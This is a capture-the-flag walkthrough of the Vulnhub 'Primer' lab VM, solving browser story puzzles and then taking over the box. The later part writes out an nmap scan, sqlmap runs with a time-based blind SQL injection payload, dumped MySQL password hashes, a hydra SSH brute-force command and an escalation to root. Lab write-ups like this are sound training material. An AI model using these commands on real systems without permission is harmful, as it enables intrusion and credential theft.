Teach some basic well known techniques and attacks. Spark some curiosity, make the user look at the source code and try to figure out what’s going on behind the scenes. The main goal is to give a nice welcoming intro to the scene and hopefully also teach something about ethics and responsibility.
I know it says in the description that there will be a web server running and I probably will never have to leave the browser, but it never hurts to look. So like always, I start with a nmap scan.
Nmap scan report for 192.168.110.2 Host is up (0.00033s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 52581/tcp open status 1 (RPC #100024) MAC Address: 08:00:27:A6:48:9A (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Besides port 80, port 22, 111 and 52581 are also open. Maybe I never have to use it, it’s always good to know what’s out there. Like a good boy, I’ll check the web server out first.
When I directed my browser to the website there is a piece of text, telling a story. I also notice I’ll need an username and password to proceed. When I check the source code there is a piece of text that gave away a clue on how to proceed.
Some f0rms are easier than others.
This one was just a means to get to the next level so there was no need for her to apply her full set of skills or fake credentials. Manufacturing a bo0le4n response would probably be enaugh to let her pass.
In the meantime I let dirb brute-force its way in and it came back with some useful information.
Looks like there is a robots.txt file available and a site running on phpmyadmin.
When I check out the robots.txt file there is another page where there is more of the story.
The title of the story looks like a fork bomb.
The rabbit hole got deeper
On the page there is a link to yet another page with a part of the story. Also this page is titled [FORK]. On the page there is a reference to another node. Again it’s an odd looking string. It looks like a md5 hash. When I crack the hash, the result is the number 13. When I check the previous 2 strings I get the numbers 7 and 11.
[4_8f14e45fceea167a5a36dedd4bea2543] –> [4_7]
[5_6512bd43d9caa6e02c990b0a82652dca] –> [5_11]
[6_c51ce410c124a10e0db5e4b97fc2af39] –> [6_13]
When I follow this link, I get another login mechanism. Canceling this popup ends in a warning.
When I check the source code of the page with the login pop-up, I get another part of the story and another lead to follow.
[7_70efdf2ec9b086079795c442636b55fb] –> [7_17]
When I check out the source code of the page with the red warning, there is nothing useful other than the 6 SHA256 hashes that are already shown on the page itself. I tried to crack the hashes, but I guess I don’t have the proper wordlist. On the net they’re also unknown. So I’ll follow the found clue and see where it leads.
/*”Someone didn’t bother reading my carefully prepared memo on commonly-used passwords. Now, then, as I so meticulously pointed out, the four most-used passwords are: love, sex, secret, and…” – The Plague*/
When I decoded the hex into readable text and removed the ‘?’ characters from the text with the ‘sed‘ function, I got another hash plus I also got the real name of the girl in the story: ‘Nieve‘. When I crack the hash , I get ‘GOD’.
To get back at the piece of text signed by ‘The Plague’, the answer to the missing part is ‘god‘ (like found in the hash). After dropping something random in the input-field of the login pop-up on this page, I get redirect to another page.
Again with the red text and the hashes. Unfortunately these hashes I also couldn’t crack or were known hashes. Also I couldn’t find anything in the source code. It feels like I’ve reached the end of the rabbit hole. With the newly found password in hand, I return to the very first login pop-up.
Through the looking glass
After I arrived on the page with the first login pop-up I entered ‘GOD’. Not what I hoped for. So on to the second one.
Bummer….it results in the page I already read after decoding the hex.
I ran sqlmap on the found phpmyadmin page, but to no avail. Because I was getting stuck, I looked over what I had found, but hadn’t finished. The md5 hashes as pages. Those should mean something…..anything hahaha (sounding desperate). After listing them and breaking my head over them there was a logic in the numbers. The left column was adding up by one (sequential), but the right column was repetitive (4, 2, 4). Logically the next number would be 2. When adding 2 to 17 the result is 19. When I check on Google it seems I’m dealing here with primes (Well isn’t that coincidence? this challenge also is named ‘primer’ 🙂 ).
Because all the strings were hashed, this one will need to be hashed also to work. With the md5 function I hash the string.
[8_19] –> [8_1f0e3dad99908345f7439f8ffabdffc4]
At the bottom there is a link. When following that link I arrive on a page with a kind of ‘terminal’. When typing ‘help’, I get a view of the options that are presented to me.
When I return to the terminal I list all the running processes.
USER PID CPU MEM COMMAND root 3793 4.0 3.4 connect falken@Erebus root 2005 1.1 71.0 c0re -t Chaos nieve 29529 0.8 1.3 ps
Am I nieve? hahahahaha
Looks like user root connected to falken@Erebus. In the /usr/ folder/ there are several users. There are 2 users with readable logs, willis and falken. When looking in the /bin/ folder/ there is a program called ‘date’. When I run it, it tells me the date right now is Tuesday 6th of July 2032 02:22:05 PM. The logs from willis and falken are created in july and august 2028.
According to /etc/network/ there are 3 connections running. eth0 and eth1 I can look in too, but with eth2 I get access denied.
When I try to connect with falken@Erebus I need a password. After reading the logs from falken, It’s likely that the password consists of the name Joshua and his birthday. Seeing the date of the log is 06-08-2028 and the age of joshua is 44, makes it that he’s born in 1984. After several tries, it seems that joshua1984 is the correct one.
After a very short LSD trip, I found myself again on a page with a terminal. When I check the usr folder of falken I find 2 logfiles which I can read. They look like base64 encoded and with the decode option, I can finally read them.
9th of August 2028 I have joined the network from home and connected to the Erebus server. I will continue my work from here but I will have to be more careful. Now, Erebus was the second AI installed after Chaos. I wasn’t part of the team but most of the members were my friends, so I know my way around here.
10th of August 2028 Ok, the problem I have with the Chaos c0re is that it’s source is shifting too fast. Every time I execute a small part it breaks down or begins to morph and grow in order to replicate functions of different parts. The signaling is also going crazy even on segments that are relatively stable. Signaling to disconnected parts! And reactions to responses that would have but definitely have not been sent… Am I going crazy or is Chaos experiencing phantom pain?
The other 2 raise some questions. When I try to open them, the system freezes up. There has to be a way to read them. In the last part the logs were plain text. Now some are encoded. Seeing I have more options besides base64 I think it’s time to try them all.
After fumbling with those 2 logs, It comes to my attention that ‘decode gz’ is the option to proceed. With the last log the output is gibberish. Because the letters are formed in a manner that looks like a sentence, I suspect that there has been some kind of rotation. Luckely there is also an option for decoding rot13. When I copy the string and decode it using rot13, there is a mention of ‘TrivialZ3r0’.
When I check the running processes it looks like the good falken is connected to this TrivialZ3r0.
USER PID CPU MEM COMMAND root 3251 8.7 4.0 connect falken@TrivialZ3r0 root 2677 49.7 48.8 c0re -t Erebus nieve 84687 1.0 0.9 ps
When I advise Google on what TrivialZ3r0 would be, I get a hit on a mathematical hypothesis called the ‘Riemann hypothesis‘. Too bad I can’t form a list of the found data and combine it with hydra to get my way in. So I make a list and sort out what is completely useless and what would make sense as a password.
After a long time trying different words, it seems that ‘riemann’ was the correct one. After a small video sequence I arrive at TrivialZ3r0. Same surrounding, same routine. But in this case there is a /passwd/ folder with 3 hashes in them.
falken: 61ea1974dd974297913b1fa2f0470d26 –> Riemann
chaos: 85241de03d1254ac40274b02caafcd99 –> 2.718281828459045
mccarthy: f74bfa0e35e5089a0bb743a893b4c7e3 –> m4xw*311#
After checking the running processes again, I connect to ‘Wintermute’ with the found password for ‘chaos’.
Again a small video sequence and I can see that ‘nieve’ has found the end of the road. There is a file called ‘nieve’ and when reading the content of the file there are some credentials for nieve if she wants to join the ‘hive mind’ and enter ‘Zephis’.
When I connect with Zephis, I get the rolling credits.
Most boot2root revolve around pwning the system and acquire root privileges. This one was more focused on doing everything inside the browser. But there is another way in.
I figured I hadn’t try sqlmap in the primary page yet, which looked like a good idea now. After grabbing the HTML header I fed it to sqlmap and let it rip.
root@kali:~/Documents/ctf/Primer1# sqlmap -r header2.txt --dbms=mysql --level=5 --risk=3 --current-db .. sqlmap identified the following injection point(s) with a total of 2733 HTTP(s) requests: --- Parameter: usr (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: usr=test'||(SELECT 'xXKx' FROM DUAL WHERE 7283=7283 AND SLEEP(5))||'&pw=123&commit=Login --- [15:25:39] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 8.0 (jessie) web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.12 .. [15:26:19] [INFO] adjusting time delay to 1 second due to good response times test current database: 'test' [15:26:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.110.2' .. Database: test [1 table] +-------+ | users | +-------+ .. [15:35:48] [INFO] analyzing table dump for possible password hashes Database: test Table: users [1 entry] +----+----+-----+---------+ | ID | pw | usr | text | +----+----+-----+---------+ | 1 | pw | usr | <blank> | +----+----+-----+---------+ ..
This current database is really useless. Let’s try one more time but no I’m aiming for more databases.
root@kali:~/Documents/ctf/Primer1# sqlmap -r header2.txt --dbms=mysql --level=5 --risk=3 --dbs .. available databases : [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test .. Database: phpmyadmin Table: pma__users [0 entries] +----------+-----------+ | username | usergroup | +----------+-----------+ +----------+-----------+ ..
After I noticed that the phpmyadmin database was empty, I hoped that the mysql database was more promising and not another troll.
Database: mysql [24 tables] +---------------------------+ | user | | columns_priv | | db | | event | | func | | general_log | | help_category | | help_keyword | | help_relation | | help_topic | | host | | ndb_binlog_index | | plugin | | proc | | procs_priv | | proxies_priv | | servers | | slow_log | | tables_priv | | time_zone | | time_zone_leap_second | | time_zone_name | | time_zone_transition | | time_zone_transition_type | +---------------------------+ .. Database: mysql Table: user [7 entries] +------------------+-------------------------------------------+ | User | Password | +------------------+-------------------------------------------+ | backdoor | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 | | debian-sys-maint | *0A799FB65F1A7F8E0B0F9C7CBE0983029BDF3D63 | | phpmyadmin | *EDDB5D9F648E137B72DC65A9904FBFC9FC4A4C25 | | root | *5452363E0EE57308206123984E21A8F6ECFF23CA | | root | *5452363E0EE57308206123984E21A8F6ECFF23CA | | root | *5452363E0EE57308206123984E21A8F6ECFF23CA | | root | *5452363E0EE57308206123984E21A8F6ECFF23CA | +------------------+-------------------------------------------+
After cracking the hash it seems that the password for root ‘PRIMER’ is. The other hashes aren’t known and I let them be, instead of using time consuming pure brute forcing.
I have collected a lot of data along the way and put it all in a list. With this list I figure it’s a good way to try and get access to port 22.
hydra -s 22 -v -L /root/Documents/ctf/Primer1/primer.dic -P /root/Documents/ctf/Primer1/primer.dic -t 10 192.168.110.2 ssh
The same password as root from the MySQL database.
root@kali:~/Documents/ctf/Primer1# ssh email@example.com -p 22 firstname.lastname@example.org's password: Permission denied, please try again. email@example.com's password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Sep 1 17:23:29 2016 from 192.168.110.3 nieve@PRIMER:~$ nieve@PRIMER:~/PRIMER$ ls -lah total 68K drwxr-xr-x 12 nieve nieve 4.0K Oct 25 2015 . drwxr-xr-x 3 nieve nieve 4.0K Oct 25 2015 .. drwxr-xr-x 2 nieve nieve 4.0K Oct 25 2015 10_23693cff748o49r45d77b6c7d1b9afcd drwxr-xr-x 2 nieve nieve 4.0K Oct 25 2015 1_c81e728d9d4c2f636f067f89cc14862c drwxr-xr-x 2 nieve nieve 4.0K Oct 25 2015 2_eccbc87e4b5ce2fe28308fd9f2a7baf3 drwxr-xr-x 2 nieve nieve 4.0K Oct 25 2015 3_e4da3b7fbbce2345d7772b0674a318d5 drwxr-xr-x 2 nieve nieve 4.0K Oct 25 2015 4_8f14e45fceea167a5a36dedd4bea2543 drwxr-xr-x 2 nieve nieve 4.0K Oct 25 2015 5_6512bd43d9caa6e02c990b0a82652dca drwxr-xr-x 2 nieve nieve 4.0K Oct 25 2015 6_c51ce410c124a10e0db5e4b97fc2af39 drwxr-xr-x 2 nieve nieve 4.0K Oct 25 2015 7_70efdf2ec9b086079795c442636b55fb drwxr-xr-x 2 nieve nieve 4.0K Oct 25 2015 8_1f0e3dad99908345f7439f8ffabdffc4 drwxr-xr-x 2 nieve nieve 4.0K Oct 25 2015 9_37693cfc748049e45d87b8c7d8b9aacd -rw-r--r-- 1 nieve nieve 5.8K Oct 25 2015 index.html -rw-r--r-- 1 nieve nieve 1.3K Oct 25 2015 localhost.sql -rw-r--r-- 1 nieve nieve 443 Oct 25 2015 login.php -rw-r--r-- 1 nieve nieve 59 Oct 25 2015 robots.txt
After looking into the system as nieve, I didn’t found anything that could really elevate my privileges. So I changed to root with the same password as nieve.
nieve@PRIMER:~$ su root Password: root@PRIMER:/home/nieve# id uid=0(root) gid=0(root) groups=0(root) root@PRIMER:/home/nieve# cd /root root@PRIMER:~# ls -lah total 20K drwx------ 2 root root 4.0K Oct 25 2015 . drwxr-xr-x 21 root root 4.0K Oct 25 2015 .. -rw------- 1 root root 2.5K Jan 3 2016 .bash_history -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc -rw-r--r-- 1 root root 140 Nov 19 2007 .profile
Unfortunately the /root/ folder was empty, so this journey ends here.
It was a fun challenge and a great story to follow. Because I like the themed challenges, I’ll look for more. Thanks to the author for taking the time to build it and thanks to Vulnhub for hosting it.